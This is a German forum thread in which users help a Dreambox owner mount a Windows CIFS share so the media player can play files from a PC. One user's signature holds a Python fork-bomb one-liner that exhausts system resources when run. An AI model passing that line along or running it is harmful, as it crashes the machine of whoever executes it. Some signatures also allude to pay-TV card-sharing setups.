Wie streamen?

    • Wie streamen?

      Hallo!

      Ich bin Dreambox-Neuling und habe eine Frage zum streamen.
      Ich möchte mit meiner Dreambox auf einen freigegebenen Ordner auf meinem PC zugreifen um die dort liegenden Dateien abzuspielen.

      Wie stelle ich das an? Mit dem Mediaplayer kann ich offensictlich nur auf den Dreambox Flash bzw. auf den angesteckten USB-Stick zugreifen.

      Was muss ich tun um Zugriff auf den PC zu bekommen?

      Danke für eure Hilfe.
    • Auf deinem PC den entsprechenden Ordner freigeben und danach an der Dreambox im Netzwerkbrwoser deinen PC und dessen Freigabe suchen lassen.

      Nachdem Die Freigabe vom PC gefunden wurde, diese einfach mounten und schon kannst du den Mount im Mediaplayer verwenden.


      mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

    • Menü -> Einstellungen -> System -> Netzwerk


      mfg,
      KLPsAUGER
      Dreambox 8000sscc, Dreambox 800se, NAS 1 (Buffalo 1TB LinkStation), NAS 2 (Buffalo 1TB LinkStation mit FTP Server), NAS 3 (Synology Ds2009+ mit 2TB Platten im Raid 0 - Verbund) 14 Smargo, Ubuntu - Server / CCcam & 2 aktiven 7 - Port USB Hub's, DLan (develo 200AVplus), DLink (DES-1005D), TP-Link (TL-SG1005D), 3Com (4228G), hama (Hub & Cardreader), CF - Karte (2x a 2GB), SD - Karte (2GB), Router (Fritz!Box 7390), externer DVD-Brenner (LG GE20LU, USB 2.0, schwarz), Teufel Concept E 400 - digital (Musikanlage)

    • Und solltest du das 'Glück' haben wie es bei mir gewesen ist, das der Netzwerkbrowser dein System findet, aber beim aufklappen [OK] keine Shares, dann musst du die in der Box einfach manuell anlegen - hierbei darauf achten das du CIFS verwenden (ich geh mal davon aus das du ein Windows hast). Wenn du dann im Media-Player nichts browsen kannst überprüfe auf deinem System mal ob die Firewall dazwischen funkt ;)
      Heimkino WZ: Samsung UE55F8590 | Dreambox 7020hd | Raspberry Pi | Denon AVR-X4000 | Sony PS3 (320GB) | Sony BDP-S350 | Nintendo Wii | Sony PS2 | Xbox 360 | Logitech Harmony One
    • Original von KLPsAUGER
      Menü -> Einstellungen -> System -> Netzwerk


      mfg,
      KLPsAUGER


      könnte mir das bitte einer mal genauer erklähren!?DANKE ?(
      Wer auf Böses sinnt, betrügt sich selbst, wer heilsamen Rat gibt, erntet Freude!!!
      Sky Komplett Abo Vodafone West AllStars UM02 V23 Karte OScam UpToDate
      1 Box Dreambox 900 RC 20 DVB-C FBC 3TB Festplatte V23
      2 Box Dreambox 820 HD DVB-C T2 Dual 1TB Festplatte UM02
      3 Box Vu Solo Se V2 DVB-C Dual 1TB Festplatte UM
    • Original von Tschipel
      Und solltest du das 'Glück' haben wie es bei mir gewesen ist, das der Netzwerkbrowser dein System findet, aber beim aufklappen [OK] keine Shares, dann musst du die in der Box einfach manuell anlegen - hierbei darauf achten das du CIFS verwenden (ich geh mal davon aus das du ein Windows hast). Wenn du dann im Media-Player nichts browsen kannst überprüfe auf deinem System mal ob die Firewall dazwischen funkt ;)


      Also genau so ist es, das Netzwerk wird zwar gefunden, aber die freigegeben Ornder werden nicht angezeigt.

      Kannst du evtl. etwas näher drauf eingehen wie ich die manuelle Freigabe mache? Gefunden habe ich die Option, jedoch sagen mir einige Begriffe nichts.
    • Original von darkr
      Ist die Variante mit VLC nicht die einfachste? Dazu gibts hier doch Anleitungen.


      Unnötig da diese box fast alle formate abspielt die wichtig sind
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von Lightwizzard
      Original von Tschipel
      Und solltest du das 'Glück' haben wie es bei mir gewesen ist, das der Netzwerkbrowser dein System findet, aber beim aufklappen [OK] keine Shares, dann musst du die in der Box einfach manuell anlegen - hierbei darauf achten das du CIFS verwenden (ich geh mal davon aus das du ein Windows hast). Wenn du dann im Media-Player nichts browsen kannst überprüfe auf deinem System mal ob die Firewall dazwischen funkt ;)


      Also genau so ist es, das Netzwerk wird zwar gefunden, aber die freigegeben Ornder werden nicht angezeigt.

      Kannst du evtl. etwas näher drauf eingehen wie ich die manuelle Freigabe mache? Gefunden habe ich die Option, jedoch sagen mir einige Begriffe nichts.


      Also zuerst einmal musst du auf deinem Windows System eine Freigabe erstellen. Den Namen der Freigabe wirst du anschließend brauchen. Ich bediene mich mal am Bild von sven hierfür - wir wollen das Rad ja nicht doppelt erfinden.

      [Blockierte Grafik: http://newnigma2.to/wbb2/galerie/bilder/bild-652.jpg]

      • Aktiv - muss natürlich 'aktiviert' sein.
      • Der lokale Freigabename ist das, was später im Media-Player angezeigt wird.
      • Freigabetyp ist 'CIFS Freigabe'
      • Server IP ist die IP-Adresse der Maschine wo du deine Freigabe eingerichtet hast.
      • Server Freigabe ist der von dir gewählte Freigabename.
      • Use as HDD replacement musst du für dich selbst entscheiden - mit 'ja' kannst du dorthin auch TV Sendungen aufzeichnen, vorausgesetzt zu hast auf deinem PC auch Schreibrechte auf den Freigabeordner vergeben.
      • Als Benutzername und Passwort trägst du am besten das ein, was du auch zum anmelden an der Maschine verwendest.
        Wenn du hier andere Benutzer und Passwörter verwendest, dann müssen diese angelegt werden und du musst logischerweise auch bei der Freigabe genau 'diesen' Benutzern entsprechende Rechte eintragen.
      Heimkino WZ: Samsung UE55F8590 | Dreambox 7020hd | Raspberry Pi | Denon AVR-X4000 | Sony PS3 (320GB) | Sony BDP-S350 | Nintendo Wii | Sony PS2 | Xbox 360 | Logitech Harmony One

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Tschipel ()

    • Ich bekomme es leider nicht hin.

      Ich habe auf meinem Windows 7 PC ein komplettes Laifwerk als "test" freigegeben. Firewall ist komplett aus.

      In dem Netzwerkbrowser wird der PC korrekt erkannt, jedoch werden keine Ordner angezeigt.

      Dann habe ich eben eine manuelle Freigabe eingerichtet:

      Aktiv - an
      Lokaler Freigabename: ttest
      Server IP: die ip eben
      Server Freigabe: test
      use an HDD replacement: ja
      Freigabeoption: rw
      Benutzername und Passwort entsprechend meinem Win7 Benutzerkonto

      Im Media Player wird der Ordner ttest leider nicht angezeigt.

      Was habe ich übersehen?

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Lightwizzard ()

    • Also bei mir ist es ganz einfach eingetragen:
      • Aktiv einschalten
      • Lokaler Freigabename DREAMBOX << Das ist der Name der im Media Player zu sehen ist
      • Freigabetyp CIFS Freigabe
      • Server IP xxx.xxx.xxx.xxx
      • Server Freigabe DREAMBOX << das ist der Name der Freigabe auf dem Win7 Rechner
      • als HDD Ersatz nutzen ja
      • Freigabeoptionen rw
      • Benutzername %Win7_User%
      • Passwort %Win7_Passwort%

      In deiner Auflistung hab ich nicht das 'Freigabetyp CIFS Freigabe' gefunden.
      Check das bitte noch mal.Backslash ist vollkommen unnötig.
      Heimkino WZ: Samsung UE55F8590 | Dreambox 7020hd | Raspberry Pi | Denon AVR-X4000 | Sony PS3 (320GB) | Sony BDP-S350 | Nintendo Wii | Sony PS2 | Xbox 360 | Logitech Harmony One

      Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von Tschipel ()